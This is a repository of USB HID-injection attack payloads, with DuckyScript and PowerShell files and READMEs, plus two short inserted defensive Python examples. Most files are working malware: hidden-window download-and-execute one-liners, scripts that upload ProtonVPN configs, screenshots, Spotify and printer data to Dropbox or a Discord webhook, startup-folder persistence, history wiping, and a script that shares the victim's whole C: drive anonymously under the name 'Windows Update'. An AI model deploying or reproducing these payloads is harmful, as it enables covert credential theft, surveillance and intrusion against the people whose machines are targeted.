Remove-Item (Get-PSreadlineOption).HistorySavePath # Empty recycle bin Clear-RecycleBin 
-Force -ErrorAction SilentlyContinue } $F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt" Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1 DropBox-Upload -f $F1 Clean-Exfil ================================================ FILE: OMG/payloads/Printer-Recon/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon

## Description

This payload is meant to exfiltrate printer information for further social engineering or driver exploitation. Can also be used to find printer web interfaces on the network

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Printer-Recon/payload.txt ================================================ REM Title: Printer-Recon REM Author: atomiczsec REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Priv-Paths/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon

## Description

A payload to enumerate unquoted service paths for privilege escalation and send to a discord webhook.

## Getting Started

### Dependencies

* Discord Webhook or other service that uses webhooks
* Windows 10

### Executing program

* Plug in your device
* Command will be entered in the command prompt to search for unquoted service paths so you can later exploit them for priv esc

```
wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
```
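The `wmic` filter above looks for the same condition a defender checks during hardening: a service whose executable path contains a space but is not wrapped in quotes. The following is an added example, not code from this repository: a Python audit that flags such `ImagePath` values and produces the quoted replacement. The service records and function names are constructed for illustration, and unlike the filter above it reports every start mode and every directory.

```python
import re

# Executable portion = shortest prefix ending in ".exe" that is followed by
# whitespace or end of string; whatever follows is treated as arguments.
EXE_SPLIT = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def quoted_fix(image_path):
    """Return the corrected ImagePath when the executable path contains a
    space and is not quoted; return None when nothing needs fixing."""
    path = image_path.strip()
    if path.startswith('"'):
        return None                      # already quoted
    match = EXE_SPLIT.match(path)
    if not match:
        return None                      # not an .exe image (e.g. a driver)
    exe, args = match.group(1), match.group(2) or ""
    if " " not in exe:
        return None                      # no space, so parsing is unambiguous
    return f'"{exe}"{args}'


def audit_services(records):
    """records: iterable of dicts with name, startmode, pathname
    (the columns requested by the wmic command above)."""
    findings = []
    for rec in records:
        fix = quoted_fix(rec["pathname"])
        if fix is not None:
            findings.append({"name": rec["name"],
                             "startmode": rec["startmode"],
                             "fix": fix})
    # Auto-start services first: they launch at boot without user action.
    findings.sort(key=lambda f: (f["startmode"].lower() != "auto", f["name"].lower()))
    return findings


# Constructed inventory (not taken from a real host).
SERVICES = [
    {"name": "BackupHelper", "startmode": "Manual",
     "pathname": r"C:\Program Files (x86)\Backup Helper\bh.exe"},
    {"name": "AcmeUpdater", "startmode": "Auto",
     "pathname": r"C:\Program Files\Acme Tools\updater.exe -k run"},
    {"name": "Spooler", "startmode": "Auto",
     "pathname": r"C:\Windows\System32\spoolsv.exe"},
    {"name": "VendorAgent", "startmode": "Auto",
     "pathname": r'"C:\Program Files\Vendor\agent.exe" --service'},
]

if __name__ == "__main__":
    for finding in audit_services(SERVICES):
        print(f'{finding["name"]:<14}{finding["startmode"]:<8}{finding["fix"]}')
```

The corrected string belongs in the service's `ImagePath` value under `HKLM\SYSTEM\CurrentControlSet\Services\<service name>`.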

## Contributing

All contributors' names will be listed here

* atomiczsec

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Priv-Paths/payload.txt ================================================ REM Title: Priv-Paths REM Author: atomiczsec REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. REM Target: Windows 10 DELAY 3000 GUI r DELAY 1000 STRING cmd ENTER DELAY 500 STRING cd %HOMEPATH% ENTER DELAY 1000 STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt ENTER DELAY 1000 STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK ENTER DELAY 200 STRING del p.txt ENTER DELAY 100 STRING exit ENTER ================================================ FILE: OMG/payloads/Proton-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Proton-Hog

A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as account information.

## Description

This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file

Then dropbox will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Proton-Hog/payload.txt ================================================ REM Title: Proton-Hog REM Author: atomiczsec REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Proton-Hog/s.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } # Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) { try { Write-Host "The VPN folder has not been found. 
" } catch { throw $_.Exception.Message } } else { $protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN" cd $protonVpnPath Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd Get-ChildItem | cd # Upload user.config to dropbox DropBox-Upload -f "user.config" } ================================================ FILE: OMG/payloads/Pwn-Drive/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Pwn-Drive

A payload to share the victim's "C:" drive to the network.

## Description

This payload will share the victim's entire "C:" drive to the entire network for further exploitation.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Pwn-Drive/c.ps1 ================================================ #Pwn-Drive #Enable Network Discovery netsh advfirewall firewall set rule group=”network discovery” new enable=yes #Enable File and Print netsh firewall set service type=fileandprint mode=enable profile=all #Setting Registry Values for allowing access to drive without credentials Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force #Sharing the Drive New-SmbShare -Name "Windows Update" -Path "C:\" ================================================ FILE: OMG/payloads/Pwn-Drive/payload.txt ================================================ REM Title: Pwn-Drive REM Author: atomiczsec REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/RanFunWare/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# RanFunWare

A payload to prank your friends into thinking their computer got hit with ransomware.

## Description

This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

YouTube
Twitter
I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
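
A defender-side view of the Run-box one-liner in "Executing program", as an added example that is not part of this repository: a Python triage function that normalizes abbreviated powershell.exe switches (`-w h`, `-NoP`, `-NonI`, `-ep Bypass`) and flags command lines that pair a hidden window or policy bypass with download-and-execute. The sample command lines, the `example.invalid` URLs and all function names are constructed for illustration, and the minimum switch prefixes are an assumption about how powershell.exe abbreviates its parameters.

```python
import re

# Assumed abbreviations: canonical name -> (shortest accepted prefix, aliases).
SWITCHES = {
    "windowstyle": ("w", ()),
    "noprofile": ("nop", ()),
    "noninteractive": ("noni", ()),
    "executionpolicy": ("ex", ("ep",)),
}
TAKES_VALUE = {"windowstyle", "executionpolicy"}
# Switch prefixes to accept: hyphen, slash, en dash, em dash, horizontal bar.
DASHES = "-/\u2013\u2014\u2015"

HOST = re.compile(r"(^|[\\/])(powershell|pwsh)(\.exe)?$", re.I)
DOWNLOAD = re.compile(
    r"(?<![\w-])(iwr|irm|invoke-webrequest|invoke-restmethod)(?![\w-])", re.I)
EXECUTE = re.compile(r"(?<![\w-])(iex|invoke-expression)(?![\w-])", re.I)
FIRST_TOKEN = re.compile(r'\s*(?:"([^"]+)"|(\S+))\s*(.*)$', re.S)


def canonical_switch(token):
    """Map '-w', '-NoP', '-ep' and similar to a canonical name, else None."""
    if len(token) < 2 or token[0] not in DASHES:
        return None
    key = token[1:].lower()
    for name, (shortest, aliases) in SWITCHES.items():
        if key in aliases or (name.startswith(key) and key.startswith(shortest)):
            return name
    return None


def analyze(cmdline):
    """Return {'alert', 'findings'} for a PowerShell command line, else None."""
    match = FIRST_TOKEN.match(cmdline)
    if not match or not HOST.search(match.group(1) or match.group(2)):
        return None
    tokens = match.group(3).split()
    findings = set()
    i = 0
    while i < len(tokens):
        name = canonical_switch(tokens[i])
        if name is None:
            break  # first non-switch token starts the command text
        if name in TAKES_VALUE:
            i += 1
            value = tokens[i].lower() if i < len(tokens) else ""
            if name == "windowstyle" and value and (
                    value == "1" or "hidden".startswith(value)):
                findings.add("hidden_window")
            elif name == "executionpolicy" and value in ("bypass", "unrestricted"):
                findings.add("policy_bypass")
        else:
            findings.add(name)
        i += 1
    command = " ".join(tokens[i:])
    if DOWNLOAD.search(command) and EXECUTE.search(command):
        findings.add("download_and_execute")
    alert = ("download_and_execute" in findings
             and bool(findings & {"hidden_window", "policy_bypass"}))
    return {"alert": alert, "findings": sorted(findings)}


# Constructed process-creation command lines (not captured from a real host).
SAMPLES = [
    # The README's Run-box form with a constructed URL in place of the placeholder.
    "powershell -w h -NoP -NonI -ep Bypass $pl = iwr "
    "https://files.example.invalid/s/r.ps1?dl=1; iex $pl",
    # Same behaviour spelled with full switch names and a pipeline.
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r"-ExecutionPolicy Bypass -WindowStyle 1 "
    r"irm https://files.example.invalid/x | iex",
    # Benign: a script run from disk.
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    # Not PowerShell at all.
    r"notepad.exe C:\Users\alice\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line), "<-", line[:60])
```

Commands typed into the Run box are also recorded per user under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, so the same function can be applied to those values during triage.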

================================================ FILE: OMG/payloads/RanFunWare/payload.txt ================================================ REM Title: RanFunWare REM Author: atomiczsec REM Description: This payload will prank your target into thinking their machine got hit with ransomware. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/RanFunWare/r.ps1 ================================================ #Hides Desktop Icons $Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1 Get-Process "explorer"| Stop-Process #Changes Background #URL For the Image of your choice (Wanna Cry Ransomware Background) $url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg" Invoke-WebRequest $url -OutFile C:\temp\test.jpg $setwallpapersrc = @" using System.Runtime.InteropServices; public class Wallpaper { public const int SetDesktopWallpaper = 20; public const int UpdateIniFile = 0x01; public const int SendWinIniChange = 0x02; [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); public static void SetWallpaper(string path) { SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange); } } "@ Add-Type -TypeDefinition $setwallpapersrc [Wallpaper]::SetWallpaper("C:\temp\test.jpg") #Pop Up Message function MsgBox { [CmdletBinding()] param ( [Parameter (Mandatory = $True)] [Alias("m")] [string]$message, [Parameter (Mandatory = 
$False)] [Alias("t")] [string]$title, [Parameter (Mandatory = $False)] [Alias("b")] [ValidateSet('OK','OKCancel','YesNoCancel','YesNo')] [string]$button, [Parameter (Mandatory = $False)] [Alias("i")] [ValidateSet('None','Hand','Question','Warning','Asterisk')] [string]$image ) Add-Type -AssemblyName PresentationCore,PresentationFramework if (!$title) {$title = " "} if (!$button) {$button = "OK"} if (!$image) {$image = "None"} [System.Windows.MessageBox]::Show($message,$title,$button,$image) } MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning ================================================ FILE: OMG/payloads/Screen-Shock/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: OMG/payloads/Screen-Shock/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Screen-Shock

This payload is meant to exfiltrate screenshots of all monitors and send them to a Dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)

## Description

This payload uses iwr to download 2 files

* I.bat
* c.ps1

**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup

**c.ps1** will sit in the AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds

The contents will then be sent to the DropBox for viewing pleasure

## Getting Started

### Dependencies

* Pastebin or other file sharing service, Dropbox
* Windows 10
* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload

### Executing program

* Plug in your device
* Device will download both files and place them in proper directories to then run the script

```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```

## Contributing

All contributors' names will be listed here:

[atomiczsec](https://github.com/atomiczsec)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

YouTube
Twitter
I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Screen-Shock/c.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } while(1){ Add-Type -AssemblyName System.Windows.Forms,System.Drawing $screens = [Windows.Forms.Screen]::AllScreens $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height) $bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height) $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png") $graphics.Dispose() $bmp.Dispose() start-sleep -Seconds 15 "$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload } ================================================ FILE: OMG/payloads/Screen-Shock/payload.txt ================================================ REM 
Title: Screen-Shock REM Author: atomiczsec REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) REM Target: Windows 10 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: OMG/payloads/Screen-Shock/placeholder ================================================ ================================================ FILE: OMG/payloads/Spotify-Spy/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Spotify-Spy

This payload is meant to exfiltrate Spotify usernames on the device. Some people are too afraid to ask for their Spotify or playlist so here is a sneaky way to do so.

## Description

Have you ever been too afraid to ask your co-worker what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their Spotify username for you so you don't have to socially interact with anyone!

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

YouTube
Twitter
I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Spotify-Spy/SS.ps1 ================================================ #Spotify-Spy # See if file is a thing Test-Path -Path "$env:APPDATA\Spotify\Users" #Create varible for file name $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt" # Gets the name of the spotify user cd "$env:APPDATA\Spotify\Users" Get-ChildItem > $F1 # Copy Spotify User to Temp Directory to get sent to Dropbox Copy-Item "$F1" -Destination "$env:tmp/$F1" function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" rm $F1 $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: OMG/payloads/Spotify-Spy/payload.txt ================================================ REM Title: Spotify-Spy REM Author: atomiczsec REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so. 
REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/Water-UnMark/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Water-UnMark

A payload to get rid of the ugly Windows activation watermark.

## Description

This script will get rid of the ugly Windows watermark. This script will automatically reboot the device. This is not activating your computer!!

## Getting Started

### Dependencies

* Unactivated Windows 10

### Executing program

* Plug in your device

```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```

## Contributing

All contributors' names will be listed here:

[atomiczsec](https://github.com/atomiczsec)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

YouTube
Twitter
I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/Water-UnMark/payload.txt ================================================ REM Title: Water-UnMark REM Author: atomiczsec REM Target OS: Windows 10 REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! DELAY 2000 GUI r DELAY 100 STRING powershell Start-Process powershell -verb runAs DELAY 1000 ALT Y DELAY 1000 STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ENTER DELAY 100 STRING Restart-Computer -Force ENTER ================================================ FILE: OMG/payloads/Water-UnMark/placeholder ================================================ ================================================ FILE: OMG/payloads/cApS-Troll/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# cApS-Troll

This payload is meant to prank your victim with TURNING on AND off CAPS LOCK

## Description

This payload is meant to prank your victim with TURNING on AND off CAPS LOCK

## Getting Started

### Dependencies

* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

### Executing program

* Plug in your device
* Define the `DEFINE TARGET_URL example.com`
* Device will download both files and place them in proper directories to then run the script

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

[atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

YouTube
Twitter
I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: OMG/payloads/cApS-Troll/a.ps1 ================================================ while (1){ Start-Sleep -Second 45 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') Start-Sleep -Second 15 $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') } ================================================ FILE: OMG/payloads/cApS-Troll/payload.txt ================================================ REM Title: cApS-Troll REM Author: atomiczsec REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: OMG/payloads/placeholder ================================================ ================================================ FILE: README.md ================================================ # Hak5 & FlipperZero HID Attack Payloads & Functions This repository contains payloads designed for various hardware hacking tools, including the USB Rubber Ducky, Bash Bunny, OMG cable, and FlipperZero. Primarily written in PowerShell and Duckyscript, these languages are commonly used for developing such payloads. If you have questions or need help, contact me using the information in this README. 
These payloads can automate processes, execute commands, or exploit system vulnerabilities, making them useful for penetration testing, cybersecurity research, and interacting with computer systems.
### Quick Reference
To learn more about Hak5 or the Flipper Zero , please visit their websites: - www.hak5.org - www.flipperzero.one DISCLAIMER: This repository is for educational purposes only and is not intended for real-world usage. The creators of this repository are not responsible for any harm or damage that may occur as a result of using the information or code provided in this repository. By accessing and using this repository, you acknowledge and agree that you do so at your own risk. ================================================ FILE: RubberDucky/payloads/Bookmark-Hog/BH.ps1 ================================================ #Bookmark-Hog # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The chrome bookmark file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The edge bookmark file has not been found. 
